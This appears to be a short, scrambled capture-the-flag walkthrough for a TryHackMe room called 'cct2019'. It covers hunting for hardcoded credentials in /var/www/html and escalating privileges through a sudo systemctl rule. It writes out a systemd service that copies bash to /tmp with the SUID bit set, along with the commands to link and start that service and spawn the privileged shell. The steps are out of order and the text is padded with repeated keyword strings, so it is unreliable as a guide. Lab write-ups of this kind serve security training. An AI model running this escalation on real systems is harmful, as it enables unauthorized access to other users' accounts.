Cct2019 Tryhackme Instant

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see:

ls -la /home Found user: mandy

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ): cct2019 tryhackme

sudo -u mandy /bin/systemctl link /home/www-data/privesc.service sudo -u mandy /bin/systemctl start privesc.service Now /tmp/bash is a SUID binary. /tmp/bash -p Now you are mandy . chmod +s /tmp/bash'

[Unit] Description=Privilege escalation [Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' cct2019 tryhackme